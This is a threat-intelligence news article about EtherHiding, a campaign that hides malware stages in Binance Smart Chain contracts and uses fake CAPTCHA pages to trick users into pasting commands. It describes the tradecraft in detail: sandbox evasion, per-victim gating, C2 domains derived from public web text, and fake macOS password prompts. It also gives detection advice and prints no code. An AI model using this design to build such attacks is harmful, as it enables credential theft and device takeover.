EtherHiding: New Stealth Attack Hides Malware C2 in Binance Smart Chain Smart Contracts
Censys researchers have detailed a new web-attack technique known as EtherHiding, in which attackers conceal malicious code inside smart contracts on the Binance Smart Chain test network and deliver it through counterfeit CAPTCHA pages. Instead of relying on traditional malware servers, the entire command infrastructure is shifted into the blockchain. Victims see a familiar “prove you’re not a robot” window, behind which lies a scenario that coerces them into copying and executing commands on their own devices. This fusion of decentralized infrastructure, social engineering, and Click-Fix techniques—where users inadvertently launch the malware themselves—complicates the hunt for attacker infrastructure and makes campaigns significantly more agile.
EtherHiding reflects a larger trend: creators of web malware are increasingly abandoning fixed servers and single-use redirect chains in favor of decentralized platforms, where payloads can be swapped out quickly and without visible traces. In this model, the smart contract acts simultaneously as storage and command panel, while the victim’s browser effectively becomes a blockchain client. A compromised website needs only a single, tiny JavaScript implant; from that moment on, attackers orchestrate the campaign’s behaviour through cheap blockchain transactions—without ever touching the website again.
Censys identified EtherHiding after observing a surge of fake CAPTCHA pages across multiple websites. These pages mimicked familiar “I’m not a robot” checks and carried a reCAPTCHA logo lifted from Wikimedia—yet were entirely fraudulent. Upon analysing one such site, researchers uncovered the EtherHiding chain: behind the counterfeit CAPTCHA lay an encrypted script that progressively unfolded into increasingly complex logic, preparing the browser to interact with blockchain smart contracts.
A multi-layered chain then began. First, the victim’s browser requested data from smart contracts in the Binance Smart Chain test network. These contracts returned additional script fragments, which were decrypted and executed in sequence. Early-stage code checked for automated environments—sandboxes, headless browsers, or suspicious characteristics—aborting execution if anything appeared amiss. This reduced the risk of detection and hindered analysis.
If the environment passed inspection, the attack adapted to the victim’s operating system. Windows and macOS followed separate execution branches, each delivered via its own smart contracts. A form of access “gateway” was also in play: the browser received a unique identifier, and smart contracts used this ID to decide whether the next stage of the payload should be issued. With this, operators could activate or suspend infections for specific victims, modulate campaign scale, or halt deliveries entirely—simply by altering on-chain data rather than modifying code on compromised sites.
The next stage involved direct interaction with the user. A full-screen fake CAPTCHA appeared above the legitimate site, displaying familiar prompts instructing the user to “confirm you are human” and follow simple steps. The crucial step was to press a copy button and then paste the copied text into the Terminal on macOS or the Run window on Windows. By this point, the browser had prepared a malicious command—launched by the user under the illusion of completing a verification check.
On macOS, this triggered installation of a malicious component that persisted on the system and spawned an agent responsible for data theft, command-and-control communication, and execution of attacker instructions. The Windows branch operated similarly: user actions funneled into system tools that fetched and executed the malware. To defensive systems, the behaviour appeared user-initiated and legitimate, complicating detection.
Researchers also described how EtherHiding dynamically selects a command-and-control (C2) domain for its macOS branch. The malicious agent queries Telegram and Steam pages, extracts specific text, and derives a domain name from it. If the resulting domain responds correctly, it becomes the active C2 endpoint. This allows operators to rotate infrastructure simply by editing public-facing text on mainstream platforms, without altering the malware itself.
Once connected to C2, the macOS agent becomes a full stealer and synchronization client. It gathers user and device data, transmits it to the operator, and attempts to harvest the local account password using fake system dialogs indistinguishable from legitimate macOS prompts requesting credentials to “modify settings.” Believing the dialog to be genuine, victims enter their passwords, which the malware validates, stores, and forwards. The agent monitors for password changes and repeats the ruse when necessary, while continuously collecting detailed system information—software, hardware, display parameters—ultimately creating a comprehensive device “passport” with current login credentials.
The final layer is a persistent control channel. At regular intervals, the agent polls the C2 server for tasks. Any issued command is executed silently in the background, turning the device into a durable backdoor capable of data theft, arbitrary command execution, and persistent oversight of the victim’s local account.
From an infrastructure standpoint, EtherHiding diverges sharply from older campaigns like SocGholish. Whereas earlier threats relied on constantly shifting domains and servers, EtherHiding shifts its centre of gravity into the blockchain. A single injected script can linger on countless websites for years, while only the smart contract contents change to control delivery stages.
The campaign nevertheless leaves distinct fingerprints that Censys uses to detect it. On ordinary, non-crypto-related websites, blockchain-interaction libraries are exceptionally rare; their sudden appearance, combined with a fake reCAPTCHA logo, is a strong indicator. From 21 October to 20 November alone, Censys observed between 1,403 and 1,671 sites per day with fake CAPTCHA pages across multiple campaigns—averaging roughly 1,549 per day. EtherHiding represents only a slice of this activity, but its blend of blockchain, fake CAPTCHA pages, and Click-Fix techniques makes it conspicuously sophisticated.
Researchers emphasize that fake CAPTCHA pages, blockchain hosting, and Click-Fix can each be dangerous in isolation; their combination magnifies the threat. For defenders, this case illustrates the accelerating evolution of web-based threats. On endpoints, security teams should be alert when users report launching terminals, executing clipboard commands, or encountering password prompts after interacting with suspicious CAPTCHA pages. On Windows, anomalous launches of system utilities immediately after copying code from a browser are particularly telling.
At the network level, defenders should watch for encrypted script blocks, long decoding chains, and unexpected blockchain-related libraries on sites unrelated to cryptocurrency. After any suspected interaction with such fake CAPTCHA pages, experts recommend enforcing multi-factor authentication and rotating passwords, as the chain heavily relies on stealers and credential-harvesting components.
EtherHiding makes one reality starkly clear: blockchain is becoming a convenient tool for attackers not only for financial operations but also for covert delivery and dynamic updating of malicious chains. Even in decentralized environments, adversaries leave identifiable digital traces — the question is whether defenders are prepared to search for them in unfamiliar places.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
